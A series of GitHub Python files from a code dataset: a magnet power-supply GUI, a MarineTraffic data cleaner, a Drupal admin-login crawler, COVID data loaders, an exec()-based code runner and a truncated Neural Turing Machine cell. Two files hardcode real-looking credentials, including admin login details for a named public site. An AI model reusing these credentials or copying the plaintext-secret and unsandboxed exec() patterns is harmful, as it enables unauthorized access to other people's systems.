'ramp_2' or self.state == 'set_rate_2':\r\n #Sets the ramp speed to 0.2 A/s\r\n self.ser.write(str.encode('SR0.2?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n else:\r\n #Sets the ramp speed to 0.1 A/s\r\n self.ser.write(str.encode('SR0.1?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n elif self.process == 'de-energize':\r\n if self.state == 'warm_up' or self.state == 'start_ramp' or self.state == 'ramp_1':\r\n #Sets the ramp speed to 0.1 A/s\r\n self.ser.write(str.encode('SR0.1?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n else:\r\n #Sets the ramp speed to 0.2 A/s\r\n self.ser.write(str.encode('SR0.2?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n\r\n\r\n\r\n print('Process Aborted')\r\n self.log_entry('Process Aborted')\r\n\r\n self.state = 'abort'\r\n self.log_entry(f'state={self.state}')\r\n\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n #Changes Status Label\r\n statusLabel = Label(self.status, text = 'Status: Aborting', font = font1, bg = 'white', fg = 'red')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n\r\n #Abortion Process\r\n abortionMessage = f'Process has been aborted.\\nPower supply is ramping\\n down at {rate} A/s'\r\n abortionLabel = Label(self.status, text = abortionMessage, font = font3, bg = 'white', fg = 'red')\r\n abortionLabel.place(relx=0.5, rely=0.5, anchor = CENTER)\r\n\r\n self.monitor_abortion()\r\n\r\n\r\n\r\n def monitor_abortion(self):\r\n self.check_current(0, 'down')\r\n if self.state == 'done':\r\n self.interlock = False\r\n self.create_blank_status()\r\n if self.ser != None:\r\n try:\r\n self.ser.close()\r\n self.ser = None\r\n except:\r\n pass\r\n return\r\n self.root.after(500, lambda: self.monitor_abortion())\r\n\r\n def on_stop(self):\r\n # This is called when the program is exited\r\n self.abort()\r\n\r\n def quitProgram(self):\r\n print('Quit Program')\r\n self.abort()\r\n self.root.destroy()\r\n\r\n def animate(self, i):\r\n self.ax.clear()\r\n xdata = self.time_array\r\n ydata = self.current_array\r\n if len(self.current_array) > 0:\r\n current = self.current_array[len(self.current_array)-1]\r\n self.ax.set_title(f'Magnet Current - {round(current,1)} A')\r\n else:\r\n self.ax.set_title('Magnet Current')\r\n self.ax.plot(xdata,ydata)\r\n self.ax.set_xlabel('Time (s)')\r\n self.ax.set_ylabel('Current (A)')\r\n\r\n def create_blank_status(self):\r\n self.process = None\r\n\r\n if self.status is not None:\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'grey92', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n statusLabel = Label(self.status, text = 'Status: Off', font = font1, bg = 'grey92', fg = 'blue')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'grey92')\r\n process1= Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'grey92')\r\n process2 = Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'grey92')\r\n process3 = Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage3.place(relx=0.35, rely=0.6, anchor = E)\r\n process3.place(relx=0.35, rely=0.6, anchor = W)\r\n\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'grey92')\r\n process4 = Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage4.place(relx=0.35, rely=0.75, anchor = E)\r\n process4.place(relx=0.35, rely=0.75, anchor = W)\r\n\r\n #Message\r\n messageLabel = Label(self.status, text = 'Progress will be shown here\\nwhen a process is started', font = font3, bg = 'grey92')\r\n messageLabel.place(relx=0.5, rely=0.9, anchor = CENTER)\r\n\r\n def startGui(self, root=None):\r\n self.stage1Temp = 40\r\n self.stage2Temp = 4\r\n self.magnetATemp = 4\r\n self.magnetBTemp = 4\r\n self.switchTemp = 4\r\n\r\n from data_client import BaseDataClient\r\n connection = BaseDataClient()\r\n\r\n #This is the GUI for the software\r\n if root == None:\r\n self.root = Tk()\r\n else:\r\n self.root = root\r\n menu = Menu(self.root)\r\n self.root.config(menu=menu)\r\n\r\n self.root.title(\"Magnet Ramp Controller\")\r\n self.root.geometry(\"1280x768\")\r\n self.root.configure(bg='white')\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.quitProgram)\r\n if platform.system() == 'Windows':\r\n self.root.iconbitmap(\"icons/magnet.ico\")\r\n\r\n\r\n #Creates File menu\r\n filemenu = Menu(menu, tearoff=0)\r\n menu.add_cascade(label=\"File\", menu = filemenu)\r\n filemenu.add_command(label=\"Save\", command = self.save_data, accelerator=\"Ctrl+S\")\r\n filemenu.add_command(label='Settings', command = self.Settings)\r\n filemenu.add_command(label='Manual Control', command = self.manualControl)\r\n filemenu.add_separator()\r\n filemenu.add_command(label='Exit', command= self.quitProgram)\r\n\r\n\r\n #Creates Help menu\r\n helpmenu = Menu(menu, tearoff=0)\r\n menu.add_cascade(label='Help', menu=helpmenu)\r\n helpmenu.add_command(label='Instructions', command = self.Instructions)\r\n helpmenu.add_command(label='About', command = self.About)\r\n\r\n #Creates Temperature Readouts\r\n self.temps = Frame(self.root, width = 225, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.temps.place(relx = 0.12, rely = 0.4, anchor = CENTER)\r\n self.tempLabel = Label(self.temps, text = 'Temperatures', font = font1, bg = 'white', fg = 'blue')\r\n self.tempLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n #Stage 1 Temperature\r\n self.stage1a = Label(self.temps, text = 'Stage 1: ', font = font3, bg = 'white')\r\n self.stage1b= Label(self.temps, text = str(self.stage1Temp) + ' K', font = font3, bg = 'white')\r\n self.stage1a.place(relx=0.5, rely=0.3, anchor = E)\r\n self.stage1b.place(relx=0.5, rely=0.3, anchor = W)\r\n\r\n #Stage 2 Temperature\r\n self.stage2a = Label(self.temps, text = 'Stage 2: ', font = font3, bg = 'white')\r\n self.stage2b = Label(self.temps, text = str(self.stage2Temp) + ' K', font = font3, bg = 'white')\r\n self.stage2a.place(relx=0.5, rely=0.45, anchor = E)\r\n self.stage2b.place(relx=0.5, rely=0.45, anchor = W)\r\n\r\n #Magnet A Temperature\r\n self.magnetAa = Label(self.temps, text = 'Magnet A: ', font = font3, bg = 'white')\r\n self.magnetAb = Label(self.temps, text = str(self.magnetATemp) + ' K', font = font3, bg = 'white')\r\n self.magnetAa.place(relx=0.5, rely=0.6, anchor = E)\r\n self.magnetAb.place(relx=0.5, rely=0.6, anchor = W)\r\n\r\n #Magnet B Temperature\r\n self.magnetBa = Label(self.temps, text = 'Magnet B: ', font = font3, bg = 'white')\r\n self.magnetBb = Label(self.temps, text = str(self.magnetBTemp) + ' K', font = font3, bg = 'white')\r\n self.magnetBa.place(relx=0.5, rely=0.75, anchor = E)\r\n self.magnetBb.place(relx=0.5, rely=0.75, anchor = W)\r\n\r\n #Switch Temperature\r\n self.switcha = Label(self.temps, text = 'Switch: ', font = font3, bg = 'white')\r\n self.switchb = Label(self.temps, text = str(self.switchTemp) + ' K', font = font3, bg = 'white')\r\n self.switcha.place(relx=0.5, rely=0.9, anchor = E)\r\n self.switchb.place(relx=0.5, rely=0.9, anchor = W)\r\n\r\n\r\n #Creates a \"Ramp Up\" Button\r\n b1 = Button(self.root, text = 'Ramp Up', font = font2, relief = 'raised',background='deep sky blue', activebackground='lightblue', width = 13, height = 2,\\\r\n command = lambda: self.start_ramp('up'))\r\n b1.place(relx = 0.35, rely = 0.85, anchor = CENTER)\r\n\r\n b2 = Button(self.root, text = 'Ramp Down', font = font2, relief = 'raised',background = 'orange red', activebackground = 'tomato', width = 13, height = 2,\\\r\n command = lambda: self.start_ramp('down'))\r\n b2.place(relx = 0.65, rely = 0.85, anchor = CENTER)\r\n\r\n\r\n b3 = Button(self.root, text = 'Abort Process', font = font2, relief = 'raised',background = 'red', activebackground = 'pink', width = 13, height = 2,\\\r\n command = self.abort)\r\n b3.place(relx = 0.87, rely = 0.7, anchor = CENTER)\r\n\r\n self.update_data(connection)\r\n\r\n #Creates a Plot of the Magnet Power Supply Current\r\n graph = Frame(self.root, padx=10, pady=10, bg='white')\r\n graph.place(relx=0.5, rely = 0.4, anchor = CENTER)\r\n\r\n fig = Figure(figsize=(6,4))\r\n self.ax = fig.add_subplot(111)\r\n freqPlot = FigureCanvasTkAgg(fig, graph)\r\n freqPlot.get_tk_widget().grid(row=0, column=0, columnspan=5, sticky='esnw')\r\n self.ani = animation.FuncAnimation(fig, self.animate, interval = 500)\r\n\r\n self.create_blank_status()\r\n\r\n self.root.mainloop()\r\n\r\nstartProgram()","repo_name":"rhmatti/Magnet-Ramp-Controller","sub_path":"Magnet Ramp Controller.pyw","file_name":"Magnet Ramp Controller.pyw","file_ext":"pyw","file_size_in_byte":60530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7354079346","text":"from sqlalchemy import create_engine\n\ndialeto = \"mysql\"\ndriver = \"pymysql\"\nusuario = \"huan\"\nsenha = \"A-queseja1genio\"\nhost = \"127.0.0.1\"\nporta = \"3306\"\ndb = \"olist\"\n\n\nengine = create_engine(f\"{dialeto}+{driver}://{usuario}:{senha}@{host}:{porta}/{db}\")\n\nprint(engine.connect())","repo_name":"huanbarrosn/Estudos","sub_path":"programacao/sqlalchemy/aula.py","file_name":"aula.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35321560108","text":"import argparse\nfrom datetime import datetime\nfrom glob import glob\nimport json\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport sys\n\ntry:\n from config import OUTPUT_COLUMN_NAMES, COLUMN_NAMES, VESSEL_NAMES\nexcept ImportError as e:\n print(f\"failed to import from cmdline_args.py: {e}\")\n\n\ndef convert_to_timestamp(dt, encoding=\"utf-8\") -> int:\n try:\n return int(datetime.fromisoformat(dt).timestamp())\n except Exception as e:\n printv(f\"failed to convert to datetime: {dt} type {type(dt)}: {e} skipping\")\n return 0\n\n\ndef parse_args() -> dict:\n \"\"\"\n parse_args -> dict\n\n instantiate an argument parser object\n to parse the command line argument supplied by the user\n\n returns a dictionary containing all parsed command line options\n\n \"\"\"\n argp = argparse.ArgumentParser()\n\n argp.add_argument(\n \"-i\",\n \"--input-dir\",\n help=\"input directory containing data files\",\n default=os.path.curdir,\n )\n argp.add_argument(\n \"-p\",\n \"--input-pattern\",\n help=\"input pattern used to glob data files\",\n default=\"*.csv\",\n )\n argp.add_argument(\n \"-o\",\n \"--output-dir\",\n help=\"output directory, defaults to the current working directory\",\n default=os.path.curdir,\n )\n argp.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"if provided, the logging level will be set to DEBUG\",\n action=\"store_true\",\n default=False,\n )\n cmdline_args = argp.parse_args().__dict__\n\n assert os.path.isdir(cmdline_args[\"input_dir\"]), f\"not a directory: {cmdline_args['input_dir']}\"\n assert os.path.isdir(\n cmdline_args[\"output_dir\"]\n ), f\"not a directory: {cmdline_args['output_dir']}\"\n\n return cmdline_args\n\n\ndef printv(message : str):\n global cmdline_args\n if cmdline_args[\"verbose\"]:\n print(message)\n\n\ndef read_file(\n file_path: str, column_names: list, delimiter=\";\", skip_lines=1\n) -> pd.DataFrame:\n \"\"\"\n read_file() -> pd.DataFrame\n\n reads in a given csv file from marine traffic.\n\n returns a pandas DataFrame with the following columns\n mmsi | latitude | longitude | speed | heading | course | status | timestamp |\n \"\"\"\n data = pd.read_csv(\n file_path,\n names=column_names,\n delimiter=delimiter,\n converters={7: convert_to_timestamp},\n skiprows=skip_lines,\n )\n data.rename(columns={\"timestamp\": \"epoch\"}, inplace=True)\n # reorder columns in table\n data = data.loc[:, OUTPUT_COLUMN_NAMES]\n return data\n\n\ndef parse_ship_data(data: pd.DataFrame) -> dict:\n \"\"\"\n parse_ship_data -> pandas.DataFrame\n\n parses raw data from a csv file contained in a DataFrame\n and returns a dictionary containing dataframes for each individual vessel.\n \"\"\"\n\n available_mmsi = data.mmsi.unique()\n printv(f\"found {len(available_mmsi)} unique ships: {available_mmsi}\")\n\n for mmsi in available_mmsi:\n printv(f\"processing {mmsi}\")\n if mmsi in VESSEL_NAMES:\n printv(f\"parsing data for {mmsi} -> {VESSEL_NAMES[mmsi]}\")\n else:\n printv(f\"did not find mmsi {mmsi} in VESSEL_NAMES\")\n # leverage the awesome power of pandas and selecet only data where\n # the mmsi equals the current mmsi\n vessel_data = data[data[\"mmsi\"] == mmsi].copy()\n # convert timestamps to pd.DateTime objects\n vessel_data.insert(\n loc=0,\n value=pd.to_datetime(vessel_data[\"epoch\"], unit=\"s\", utc=True),\n column=\"timestamp\",\n )\n # make the newly create epoch the index of the DataFrame\n vessel_data.set_index(\"timestamp\", inplace=True)\n # drop the mmsi data column as it is constant for the whole dataframe\n vessel_data.drop(\"mmsi\", axis=1, inplace=True)\n yield (mmsi, vessel_data)\n\n\ndef sanitize_marinetraffic(cmdline_args : dict):\n printv(\"done parsing commmand line arguments\")\n printv(f\"{json.dumps(cmdline_args, indent=4)}\")\n # build a list of available files using the provided input directory, the glob matching pattern\n # and the glob function\n input_files = sorted(glob(os.path.join(cmdline_args[\"input_dir\"], cmdline_args[\"input_pattern\"])))\n if not len(input_files) > 0:\n print(f\"did not find any input files. exit.\")\n sys.exit()\n printv(f\"found {len(input_files)} input files: {input_files}\")\n frames = list()\n for data_file in input_files:\n # read in all available data files\n frames.append(read_file(data_file, column_names=COLUMN_NAMES))\n # merge data frames into one large data frame\n try:\n frames = pd.concat(frames)\n except Exception as e:\n print(f\"failed to concatenate DataFrames: {e}\")\n sys.exit()\n # sanitize data and extract data frames for individual ships\n for mmsi, vessel_data in parse_ship_data(frames):\n export_path = os.path.join(\n cmdline_args[\"output_dir\"],\n f'{mmsi}-{VESSEL_NAMES[mmsi].lower().replace(\" \", \"-\")}.csv',\n )\n printv(f\"exporting vessel data to {export_path}\")\n try:\n vessel_data.to_csv(export_path)\n except Exception as e:\n print(f\"failed to export pandas dataframe: {e}\")\n\n\n#################################################\n\nif __name__ == \"__main__\":\n cmdline_args = parse_args()\n sanitize_marinetraffic(cmdline_args)\n","repo_name":"k323r/2022_WES_offshore-wind-installation","sub_path":"src/marinetraffic/sanitize_marinetraffic.py","file_name":"sanitize_marinetraffic.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13410469144","text":"import requests\nfrom bs4 import BeautifulSoup\ns = requests.Session()\n\n\n# URL without http and any leading or trailing slashes\nprd_url = 'www.redwingsseasontickets.com'\nusername = 'redwings_admin'\npassword = \"redwingsadmin\"\n\n\n\n\n\ndef login():\t\t \n URL = \"https://\" + prd_url + \"/user/login\"\n params = {\"name\": username, \"pass\" : password, \"form_id\" : \"user_login\"}\n head = {\"Referer\":URL,'Host': prd_url,\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"}\n signin = s.post(URL, data = params, headers = head)\n print(signin.text) \n\ndef links(menu):\n menu_url = \"https://\" + prd_url + menu\n sorce = s.get(menu_url)\n sorce_text = sorce.text\n soup = BeautifulSoup(sorce_text, \"html.parser\")\n tbody = soup.find('tbody')\n main_menu = {}\n for row in tbody.findAll(\"a\", href = True, text = True):\n if row.text != 'edit' and row.text != 'delete' and row.text != 'Archive' and row.text != 'Bullpen' and row.text != 'Stand-Alone' and row['href'] != 'my-calendar' and row['href'] != 'calendar':\n main_menu[row.text] = prd_url + row['href']\n for name,path in main_menu.items():\n if path.find('http') == -1:\n path = \"https://\" + path\n visit = s.get(path)\n page_content = visit.text\n page_content = BeautifulSoup(page_content, \"html.parser\")\n article = page_content.findAll('article') \n if article: \n tab = 0 \n for tabs in article: \n for img in tabs.findAll(\"img\"):\n if img['src']: \n src = img['src']\n if src.find('cloudfront') != -1:\n out = \"FOUND CloudFront path in '\" + name + \"[\" + str(tab) + \"]\" + \"' = \" + path\n else:\n out = \"NO CloudFront Path in '\" + name + \"[\" + str(tab) + \"]\" + \"' = \" + path\n else:\n out = \"NO Image in '\" + name + \"' = \" + path\n print(out)\n tab += 1 \n\n\nlogin()\n\nmain = \"/admin/structure/menu/manage/main-menu\"\nanonymous = \"/admin/structure/menu/manage/menu-anonymous-menu\"\nlinks(main)\nlinks(anonymous)\n","repo_name":"ronit29/STP-Cloudfront-crawler-","sub_path":"drupal_login.py","file_name":"drupal_login.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21288992190","text":"from datasource.Sipder import getTencentData,getHotData,getHotSearchData\nimport utils.JdbcTemplet as jdbc\nimport sys\ndef insertHistory(data):\n \"\"\"\n 将抓取的数据解析 插入数据库\n :return:\n \"\"\"\n #封装字典前 先判断当前数据是否在表中存在 存在则不插入\n ds = data['lastUpdateTime']\n res = jdbc.getHistoryByDs(ds)\n if len(res) >0 :\n return\n\n history={}\n history['ds']=ds\n history['confirm'] =data['chinaTotal']['confirm']\n history['confirm_add']=data['chinaAdd']['confirm'] #新增确诊\n history['now_confirm']=data['chinaTotal']['nowConfirm'] #现有确诊\n history['heal']=data['chinaTotal']['heal'] #累计治愈\n history['heal_add']=data['chinaAdd']['heal'] #新增治愈\n history['dead']=data['chinaTotal']['dead']\n history['dead_add']=data['chinaAdd']['dead']\n\n #插入数据库\n jdbc.insertHistery(history)\n pass\n\ndef insertDetails(data):\n \"\"\"\n 解析数据 将数据插入到details表中\n :param data: 数据源\n :return: list 一个列表 封装的是元组,每个元组便是一条数据\n \"\"\"\n #封装列表前 先判断当前数据是否在表中存在 存在则不插入\n update_time = data['lastUpdateTime']\n res = jdbc.getDetailsByTime(update_time)\n if len(res) >0 :\n return\n\n details = [] #数据列表\n countryList = data['areaTree']#国家树形数据 一个列表\n for countryDict in countryList:\n provinceList = countryDict['children']\n for provinceDict in provinceList :\n province = provinceDict['name'] #省\n cityList = provinceDict['children'] #市 列表\n for cityDict in cityList :\n city = cityDict['name'] #市\n confirm = cityDict['total']['confirm'] #累计确诊\n confirm_add = cityDict['today']['confirm'] #新增确诊\n heal = cityDict['total']['heal']\n dead = cityDict['total']['dead']\n #封装元组 加入列表\n details.append((update_time,province,city,confirm,confirm_add,heal,dead))\n\n #插入数据\n print(details)\n jdbc.insertDetails(details)\n pass\n\ndef insertHotSearch(hotSearchList,dt):\n \"\"\"\n 解析从百度抓取的热点数据,然后插入到数据库\n :param hotList:\n :return:\n \"\"\"\n #删除今日 热搜数据 在进行插入操作\n jdbc.delHotSearchData(dt)\n jdbc.insertHotSearch(hotSearchList)\n pass\n\n\nif __name__ == \"__main__\":\n length = len(sys.argv)\n if length == 1:\n msg = \"\"\"\n 请输入一下参数:\n up_tencent 更新腾讯疫情数据\n up_baidu 更新百度热点数据\n \"\"\"\n print(msg)\n else:\n arg = sys.argv[1]\n if arg == 'up_tencent':\n data = getTencentData()\n insertHistory(data)\n insertDetails(data)\n elif arg == 'up_baidu':\n hotSearchList, dt = getHotSearchData()\n insertHotSearch(hotSearchList, dt)\n else:\n msg = '无效参数,请仔细检查!'\n print(msg)\n\n","repo_name":"Aaron-cell/NewCrown","sub_path":"datasource/DataAnalyze.py","file_name":"DataAnalyze.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28497646081","text":"from tkinter import *\nfrom PIL import ImageTk,Image\nroot = Tk()\nroot.title('Vishwa Praveen')\nroot.iconbitmap('icon.ico')\n\nmy_img = ImageTk.PhotoImage(Image.open(\"icon.ico\"))\nmy_label = Label(image =my_img)\nmy_label.pack()\n\n\n\n\nexit_button = Button(root, text=\"Exit\", command=root.quit)\nexit_button.pack()\n\n\n\n\nroot.mainloop()\n","repo_name":"vps4618/Tkinter_Codemy","sub_path":"Using Icons, Images, and Exit Buttons - Python Tkinter GUI Tutorial #8.py","file_name":"Using Icons, Images, and Exit Buttons - Python Tkinter GUI Tutorial #8.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73359018729","text":"import roots\nimport cfunctions\n\ndef execCode(code):\n try:\n global output\n exec(f\"global output\\noutput = None\\n{code}\")\n if output == None:\n output = \"output variable was not specified or is None\"\n return output\n except Exception as e:\n return f\"ERROR: {e}\"\n","repo_name":"cristian-bicheru/python-math-tool","sub_path":"source/others.py","file_name":"others.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20850129405","text":"# credit: thanks to https://github.com/snowkylin/ntm for the basis of this code\n# the major changes made are to make this compatible with the abstract class tf.contrib.rnn.RNNCell\n# additionally an LSTM controller is used, a feed-forward controller may be used\n# and 2 memory inititialization schemes are offered\n\nimport tensorflow as tf\nfrom collections import namedtuple\nfrom ntm_utils import expand, learned_init, create_linear_initializer\n\nModel1NTMState = namedtuple('Model1NTMState',\n ('controller_state', 'time', 'prev_output',\n 'att_read_vector_list', 'att_w_list', 'att_w_history', 'att_M'))\n\nModel2NTMState = namedtuple('Model2NTMState',\n ('controller_state', 'time', 'prev_output',\n 'ext_read_vector_list', 'ext_w_list', 'ext_w_history', 'ext_M',\n 'att_read_vector_list', 'att_w_list', 'att_w_history', 'att_M'))\n\nModel3NTMState = namedtuple('Model3NTMState',\n ('controller_state', 'time', 'prev_output',\n 'ext_read_vector_list', 'ext_w_list', 'ext_w_history', 'ext_M'))\n\nclass NTMCell(tf.contrib.rnn.RNNCell):\n def __init__(self, controller_layers, controller_units,\n use_att_memory=True, att_memory=None, att_memory_size=None, att_memory_vector_dim=None,\n use_ext_memory=False, ext_memory_size=None, ext_memory_vector_dim=None, ext_read_head_num=None, ext_write_head_num=None,\n dropout=0.0, batch_size=None, mode=None, addressing_mode='content_and_location',\n shift_range=1, reuse=False, output_dim=None, clip_value=20, record_w_history=False):\n self.controller_layers = controller_layers\n self.controller_units = controller_units\n\n self.att_memory_size = att_memory_size\n self.att_memory_vector_dim = att_memory_vector_dim\n self.ext_memory_size = ext_memory_size\n self.ext_memory_vector_dim = ext_memory_vector_dim\n\n self.att_read_head_num = 1 if att_memory is not None else 0\n self.ext_read_head_num = ext_read_head_num\n self.total_read_head_num = self.att_read_head_num + (ext_read_head_num if ext_read_head_num is not None else 0)\n self.ext_write_head_num = ext_write_head_num\n\n self.use_att_memory = use_att_memory\n self.use_ext_memory = use_ext_memory\n\n # need to reshape memory in order to get beam search working\n if self.use_att_memory:\n self.att_M = tf.reshape(att_memory, [-1, self.att_memory_size * self.att_memory_vector_dim])\n else:\n self.att_M = None\n\n self.addressing_mode = addressing_mode\n self.reuse = reuse\n self.clip_value = clip_value\n\n self.dropout = dropout if mode == tf.contrib.learn.ModeKeys.TRAIN else 0.0\n def single_cell(num_units):\n cell = tf.contrib.rnn.BasicLSTMCell(num_units, forget_bias=1.0)\n if self.dropout > 0.0:\n cell = tf.contrib.rnn.DropoutWrapper(cell=cell, input_keep_prob=(1.0 - self.dropout))\n return cell\n\n self.controller = tf.contrib.rnn.MultiRNNCell([single_cell(self.controller_units) for _ in range(self.controller_layers)])\n\n self.step = 0\n self.output_dim = output_dim\n self.shift_range = shift_range\n self.batch_size = batch_size\n self.mode = mode\n self.record_w_history = record_w_history\n\n self.o2p_initializer = create_linear_initializer(self.controller_units)\n self.o2o_initializer = create_linear_initializer(\n self.controller_units + \\\n (self.att_memory_vector_dim if self.use_att_memory else 0) + \\\n (self.ext_memory_vector_dim * self.ext_read_head_num if self.use_ext_memory else 0))\n\n def interact_with_memory(self, prev_state, controller_output, att=True):\n num_parameters_per_head = (self.att_memory_vector_dim if att else self.ext_memory_vector_dim) + 1 + 1 + (self.shift_range * 2 + 1) + 1\n num_heads = 1 if att else (self.ext_read_head_num + self.ext_write_head_num)\n total_parameter_num = num_parameters_per_head if att else (num_parameters_per_head * num_heads + self.ext_memory_vector_dim * 2 * self.ext_write_head_num)\n with tf.variable_scope(\"o2p_att_\" + str(att), reuse=tf.AUTO_REUSE):\n parameters = tf.contrib.layers.fully_connected(\n controller_output, total_parameter_num, activation_fn=None,\n weights_initializer=self.o2p_initializer)\n parameters = tf.clip_by_value(parameters, -self.clip_value, self.clip_value)\n head_parameter_list = tf.split(parameters[:, :num_parameters_per_head * num_heads], num_heads, axis=1)\n\n if att:\n prev_w_list = prev_state.att_w_list\n prev_M = prev_state.att_M\n prev_M = tf.reshape(prev_M, [-1, self.att_memory_size, self.att_memory_vector_dim])\n memory_vector_dim = self.att_memory_vector_dim\n else:\n prev_w_list = prev_state.ext_w_list\n prev_M = prev_state.ext_M\n prev_M = tf.reshape(prev_M, [-1, self.ext_memory_size, self.ext_memory_vector_dim])\n memory_vector_dim = self.ext_memory_vector_dim\n \n w_list = []\n for i, head_parameter in enumerate(head_parameter_list):\n k = tf.tanh(head_parameter[:, 0:memory_vector_dim])\n beta = tf.nn.softplus(head_parameter[:, memory_vector_dim])\n g = tf.sigmoid(head_parameter[:, memory_vector_dim + 1])\n s = tf.nn.softmax(\n head_parameter[:, memory_vector_dim + 2:memory_vector_dim + 2 + (self.shift_range * 2 + 1)]\n )\n gamma = tf.nn.softplus(head_parameter[:, -1]) + 1\n with tf.variable_scope('addressing_head_%d' % i):\n w = self.addressing(k, beta, g, s, gamma, prev_M, prev_w_list[i], att=att)\n w_list.append(w)\n\n # Reading (Sec 3.1)\n\n if att:\n read_vector_list = [tf.reduce_sum(tf.expand_dims(w_list[0], dim=2) * prev_M, axis=1)]\n else:\n read_w_list = w_list[:self.ext_read_head_num]\n read_vector_list = []\n for i in range(self.ext_read_head_num):\n read_vector = tf.reduce_sum(tf.expand_dims(read_w_list[i], dim=2) * prev_M, axis=1)\n read_vector_list.append(read_vector)\n\n # Writing (Sec 3.2)\n\n M = prev_M\n if not att:\n erase_add_list = tf.split(parameters[:, num_parameters_per_head * num_heads:], 2 * self.ext_write_head_num, axis=1)\n write_w_list = w_list[self.ext_read_head_num:]\n for i in range(self.ext_write_head_num):\n w = tf.expand_dims(write_w_list[i], axis=2)\n erase_vector = tf.expand_dims(tf.sigmoid(erase_add_list[i * 2]), axis=1)\n add_vector = tf.expand_dims(tf.tanh(erase_add_list[i * 2 + 1]), axis=1)\n M = M * (tf.ones([self.batch_size, self.ext_memory_size, self.ext_memory_vector_dim]) - tf.matmul(w, erase_vector)) + tf.matmul(w, add_vector)\n\n return read_vector_list, w_list, M\n\n def __call__(self, x, prev_state):\n if self.use_att_memory and self.use_ext_memory:\n prev_state = Model2NTMState(*prev_state)\n elif self.use_att_memory:\n prev_state = Model1NTMState(*prev_state)\n else:\n prev_state = Model3NTMState(*prev_state)\n\n prev_read_vector_list = (prev_state.ext_read_vector_list if self.use_ext_memory else []) + \\\n (prev_state.att_read_vector_list if self.use_att_memory else [])\n\n controller_input = tf.concat([x] + prev_read_vector_list + [prev_state.prev_output], axis=1)\n with tf.variable_scope('controller', reuse=self.reuse):\n controller_output, controller_state = self.controller(controller_input, prev_state.controller_state)\n\n if self.use_att_memory:\n att_read_vector_list, att_w_list, att_M = self.interact_with_memory(prev_state, controller_output, att=True)\n att_M = tf.reshape(att_M, [-1, self.att_memory_size * self.att_memory_vector_dim])\n\n if self.use_ext_memory:\n ext_read_vector_list, ext_w_list, ext_M = self.interact_with_memory(prev_state, controller_output, att=False)\n ext_M = tf.reshape(ext_M, [-1, self.ext_memory_size * self.ext_memory_vector_dim])\n\n if not self.output_dim:\n 